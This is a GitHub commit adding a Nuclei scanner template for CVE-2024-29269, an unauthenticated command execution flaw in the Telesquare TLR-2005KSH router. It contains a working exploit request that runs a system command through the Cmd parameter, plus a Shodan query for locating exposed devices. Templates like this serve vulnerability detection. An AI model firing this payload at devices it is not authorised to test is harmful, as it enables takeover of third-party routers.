Merge pull request #9507 from projectdiscovery/CVE-2024-29269

Create CVE-2024-29269.yaml
patch-1
Dhiyaneshwaran 2024-04-05 12:47:04 +05:30 committed by GitHub
commit d763dea884
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,45 @@
id: CVE-2024-29269
info:
name: Telesquare TLR-2005KSH - Remote Command Execution
author: ritikchaddha
severity: critical
description: |
Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server permissions.
reference:
- https://github.com/wutalent/CVE-2024-29269/blob/main/index.md
- https://gist.github.com/win3zz/c26047ae4b182c3619509d537b808d2b
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-29269
metadata:
max-request: 1
shodan-query: title:"Login to TLR-2005KSH"
tags: cve,cve2024,telesquare,tlr,rce
http:
- raw:
- |
GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=ifconfig HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<CmdResult>'
- '</xml>'
- 'Ethernet'
- 'inet'
condition: and
- type: word
part: header
words:
- 'text/xml'
- type: status
status:
- 200